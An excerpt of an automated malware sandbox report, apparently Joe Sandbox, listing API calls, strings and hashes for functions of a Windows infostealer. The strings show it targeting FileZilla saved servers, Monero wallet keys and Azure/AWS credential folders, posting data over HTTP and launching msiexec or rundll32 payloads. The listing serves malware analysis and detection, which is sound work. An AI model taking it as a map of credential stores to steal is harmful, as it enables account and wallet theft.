                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 1942843190-555421843
                                • Opcode ID: fecfe53ec03e1d779e9bb3ccff19e4d909d12185ae4ab6a7d72a0d1c922b3f47
                                • Instruction ID: ce22bc98766df1d56eb70492b9351f9e15c08f24482d3693270c153719dcca2c
                                • Opcode Fuzzy Hash: fecfe53ec03e1d779e9bb3ccff19e4d909d12185ae4ab6a7d72a0d1c922b3f47
                                • Instruction Fuzzy Hash: 90D14C72950208ABDB04EBF0DD96FEE7339EFD4305F404518F506A7191EE74AA4ACB62
                                APIs
                                  • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                  • Part of subcall function 009347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00934839
                                  • Part of subcall function 009347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00934849
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 009359F8
                                • StrCmpCA.SHLWAPI(?,015BFC50), ref: 00935A13
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00935B93
                                • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,015BFB20,00000000,?,015BA4B0,00000000,?,00951A1C), ref: 00935E71
                                • lstrlen.KERNEL32(00000000), ref: 00935E82
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00935E93
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00935E9A
                                • lstrlen.KERNEL32(00000000), ref: 00935EAF
                                • lstrlen.KERNEL32(00000000), ref: 00935ED8
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00935EF1
                                • lstrlen.KERNEL32(00000000,?,?), ref: 00935F1B
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00935F2F
                                • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00935F4C
                                • InternetCloseHandle.WININET(00000000), ref: 00935FB0
                                • InternetCloseHandle.WININET(00000000), ref: 00935FBD
                                • HttpOpenRequestA.WININET(00000000,015BFAC0,?,015BF098,00000000,00000000,00400100,00000000), ref: 00935BF8
                                  • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                  • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                  • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                  • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                  • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                  • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                • InternetCloseHandle.WININET(00000000), ref: 00935FC7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                • String ID: "$"$------$------$------
                                • API String ID: 874700897-2180234286
                                • Opcode ID: 3294485c800dd44a19ce456b2412b72e56366d2b6a473eef5f8c1ac07b5eeeaa
                                • Instruction ID: 27f17ab0ff22ac7c55710e8fdff140c6aea7496b548de2cb0abe16c9f4deb2fe
                                • Opcode Fuzzy Hash: 3294485c800dd44a19ce456b2412b72e56366d2b6a473eef5f8c1ac07b5eeeaa
                                • Instruction Fuzzy Hash: B112ED72860118AAEB15EBA0DC96FEEB378FF94704F504199F10A63191EF702E49CF65
                                APIs
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                  • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                  • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                  • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                  • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                  • Part of subcall function 00948B60: GetSystemTime.KERNEL32(00950E1A,015BA2A0,009505AE,?,?,009313F9,?,0000001A,00950E1A,00000000,?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 00948B86
                                  • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                  • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0093CF83
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0093D0C7
                                • RtlAllocateHeap.NTDLL(00000000), ref: 0093D0CE
                                • lstrcat.KERNEL32(?,00000000), ref: 0093D208
                                • lstrcat.KERNEL32(?,00951478), ref: 0093D217
                                • lstrcat.KERNEL32(?,00000000), ref: 0093D22A
                                • lstrcat.KERNEL32(?,0095147C), ref: 0093D239
                                • lstrcat.KERNEL32(?,00000000), ref: 0093D24C
                                • lstrcat.KERNEL32(?,00951480), ref: 0093D25B
                                • lstrcat.KERNEL32(?,00000000), ref: 0093D26E
                                • lstrcat.KERNEL32(?,00951484), ref: 0093D27D
                                • lstrcat.KERNEL32(?,00000000), ref: 0093D290
                                • lstrcat.KERNEL32(?,00951488), ref: 0093D29F
                                • lstrcat.KERNEL32(?,00000000), ref: 0093D2B2
                                • lstrcat.KERNEL32(?,0095148C), ref: 0093D2C1
                                • lstrcat.KERNEL32(?,00000000), ref: 0093D2D4
                                • lstrcat.KERNEL32(?,00951490), ref: 0093D2E3
                                  • Part of subcall function 0094A820: lstrlen.KERNEL32(00934F05,?,?,00934F05,00950DDE), ref: 0094A82B
                                  • Part of subcall function 0094A820: lstrcpy.KERNEL32(00950DDE,00000000), ref: 0094A885
                                • lstrlen.KERNEL32(?), ref: 0093D32A
                                • lstrlen.KERNEL32(?), ref: 0093D339
                                  • Part of subcall function 0094AA70: StrCmpCA.SHLWAPI(015B8FC8,0093A7A7,?,0093A7A7,015B8FC8), ref: 0094AA8F
                                • DeleteFileA.KERNEL32(00000000), ref: 0093D3B4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                • String ID:
                                • API String ID: 1956182324-0
                                • Opcode ID: 5b9eb717ac1dc086f40e56a2df2d7bd2224ce9fea9ed7a1d4918ce60a0833f3c
                                • Instruction ID: 5cd0861f62b1ef51534d98bfde21790751c306856fba50eb27e0d438a20bf11e
                                • Opcode Fuzzy Hash: 5b9eb717ac1dc086f40e56a2df2d7bd2224ce9fea9ed7a1d4918ce60a0833f3c
                                • Instruction Fuzzy Hash: 5CE14B72950108ABEB04EBA0DD96FEE7379FF94305F104158F106A71A1DE35AE4ACB62
                                APIs
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                  • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                  • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                  • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                  • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                  • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                  • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,015BE638,00000000,?,0095144C,00000000,?,?), ref: 0093CA6C
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0093CA89
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0093CA95
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0093CAA8
                                • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0093CAD9
                                • StrStrA.SHLWAPI(?,015BE668,00950B52), ref: 0093CAF7
                                • StrStrA.SHLWAPI(00000000,015BE650), ref: 0093CB1E
                                • StrStrA.SHLWAPI(?,015BE990,00000000,?,00951458,00000000,?,00000000,00000000,?,015B9038,00000000,?,00951454,00000000,?), ref: 0093CCA2
                                • StrStrA.SHLWAPI(00000000,015BEAF0), ref: 0093CCB9
                                  • Part of subcall function 0093C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0093C871
                                  • Part of subcall function 0093C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0093C87C
                                • StrStrA.SHLWAPI(?,015BEAF0,00000000,?,0095145C,00000000,?,00000000,015B9078), ref: 0093CD5A
                                • StrStrA.SHLWAPI(00000000,015B92A8), ref: 0093CD71
                                  • Part of subcall function 0093C820: lstrcat.KERNEL32(?,00950B46), ref: 0093C943
                                  • Part of subcall function 0093C820: lstrcat.KERNEL32(?,00950B47), ref: 0093C957
                                  • Part of subcall function 0093C820: lstrcat.KERNEL32(?,00950B4E), ref: 0093C978
                                • lstrlen.KERNEL32(00000000), ref: 0093CE44
                                • CloseHandle.KERNEL32(00000000), ref: 0093CE9C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                • String ID:
                                • API String ID: 3744635739-3916222277
                                • Opcode ID: ce14289c7315a3b46e34da6c70d8010f60eb17da772dc28add732b6f7607eb70
                                • Instruction ID: 5310751a08bd95390b18d5e861483b4c8136ff08a1241d6fac847410df49e4e0
                                • Opcode Fuzzy Hash: ce14289c7315a3b46e34da6c70d8010f60eb17da772dc28add732b6f7607eb70
                                • Instruction Fuzzy Hash: 23E10D71950108ABEB14EBA0DC92FEEB778EF94304F404159F506B7191EF306A8ACF66
                                APIs
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • RegOpenKeyExA.ADVAPI32(00000000,015BB648,00000000,00020019,00000000,009505B6), ref: 009483A4
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00948426
                                • wsprintfA.USER32 ref: 00948459
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0094847B
                                • RegCloseKey.ADVAPI32(00000000), ref: 0094848C
                                • RegCloseKey.ADVAPI32(00000000), ref: 00948499
                                  • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenlstrcpy$Enumwsprintf
                                • String ID: - $%s\%s$?
                                • API String ID: 3246050789-3278919252
                                • Opcode ID: 346db1266baca3129a101abe9aaf57de24ce1cd22cbac6dbb5ad9bd8181cdf9a
                                • Instruction ID: d955f196088392a036599b3452d2b94729232716021fdcc36357fa3a3035eb42
                                • Opcode Fuzzy Hash: 346db1266baca3129a101abe9aaf57de24ce1cd22cbac6dbb5ad9bd8181cdf9a
                                • Instruction Fuzzy Hash: 09812BB1950118ABEB68DF54CC91FEEB7B8FF88704F008298E109A6180DF706B85CF95
                                APIs
                                  • Part of subcall function 00948DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00948E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00944DB0
                                • lstrcat.KERNEL32(?,\.azure\), ref: 00944DCD
                                  • Part of subcall function 00944910: wsprintfA.USER32 ref: 0094492C
                                  • Part of subcall function 00944910: FindFirstFileA.KERNEL32(?,?), ref: 00944943
                                • lstrcat.KERNEL32(?,00000000), ref: 00944E3C
                                • lstrcat.KERNEL32(?,\.aws\), ref: 00944E59
                                  • Part of subcall function 00944910: StrCmpCA.SHLWAPI(?,00950FDC), ref: 00944971
                                  • Part of subcall function 00944910: StrCmpCA.SHLWAPI(?,00950FE0), ref: 00944987
                                  • Part of subcall function 00944910: FindNextFileA.KERNEL32(000000FF,?), ref: 00944B7D
                                  • Part of subcall function 00944910: FindClose.KERNEL32(000000FF), ref: 00944B92
                                • lstrcat.KERNEL32(?,00000000), ref: 00944EC8
                                • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00944EE5
                                  • Part of subcall function 00944910: wsprintfA.USER32 ref: 009449B0
                                  • Part of subcall function 00944910: StrCmpCA.SHLWAPI(?,009508D2), ref: 009449C5
                                  • Part of subcall function 00944910: wsprintfA.USER32 ref: 009449E2
                                  • Part of subcall function 00944910: PathMatchSpecA.SHLWAPI(?,?), ref: 00944A1E
                                  • Part of subcall function 00944910: lstrcat.KERNEL32(?,015BFAD0), ref: 00944A4A
                                  • Part of subcall function 00944910: lstrcat.KERNEL32(?,00950FF8), ref: 00944A5C
                                  • Part of subcall function 00944910: lstrcat.KERNEL32(?,?), ref: 00944A70
                                  • Part of subcall function 00944910: lstrcat.KERNEL32(?,00950FFC), ref: 00944A82
                                  • Part of subcall function 00944910: lstrcat.KERNEL32(?,?), ref: 00944A96
                                  • Part of subcall function 00944910: CopyFileA.KERNEL32(?,?,00000001), ref: 00944AAC
                                  • Part of subcall function 00944910: DeleteFileA.KERNEL32(?), ref: 00944B31
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                • API String ID: 949356159-974132213
                                • Opcode ID: f10b22fbd1e64942480cc3c2529df0aef9f28247f7889c51f7bb3d26e485f3ac
                                • Instruction ID: 7d5fa2f9aa7e30a7d89a47d0717de66577da3496553955cb6ac84f8e58d5ecb2
                                • Opcode Fuzzy Hash: f10b22fbd1e64942480cc3c2529df0aef9f28247f7889c51f7bb3d26e485f3ac
                                • Instruction Fuzzy Hash: 704172BA95021867DB50F770EC47FEE7338ABA4709F404494B589660C1EEB46BCD8B93
                                APIs
                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0094906C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateGlobalStream
                                • String ID: image/jpeg
                                • API String ID: 2244384528-3785015651
                                • Opcode ID: c7649c2b7cad45c4e3159a5568fa39c27cdc46807bbb22d0e391dbfca25ed8d1
                                • Instruction ID: ffdebac5cb52f7b8db60e5fc83bd1f4f962d87bf221f5c12ee654be320677bba
                                • Opcode Fuzzy Hash: c7649c2b7cad45c4e3159a5568fa39c27cdc46807bbb22d0e391dbfca25ed8d1
                                • Instruction Fuzzy Hash: C471EE71910208ABDB44EFE4DC89FEEB7B9BF88700F108508F51AA7290DF74A945CB61
                                APIs
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • ShellExecuteEx.SHELL32(0000003C), ref: 009431C5
                                • ShellExecuteEx.SHELL32(0000003C), ref: 0094335D
                                • ShellExecuteEx.SHELL32(0000003C), ref: 009434EA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExecuteShell$lstrcpy
                                • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                • API String ID: 2507796910-3625054190
                                • Opcode ID: dcdd0e3db0d91d44b9d88a7b679c05f15d6221067596d861b5df8db472b17f27
                                • Instruction ID: 2cbdb4b7556286c8c9c3673ed750da3b511fb047730361caf4a37aad55bcf0d2
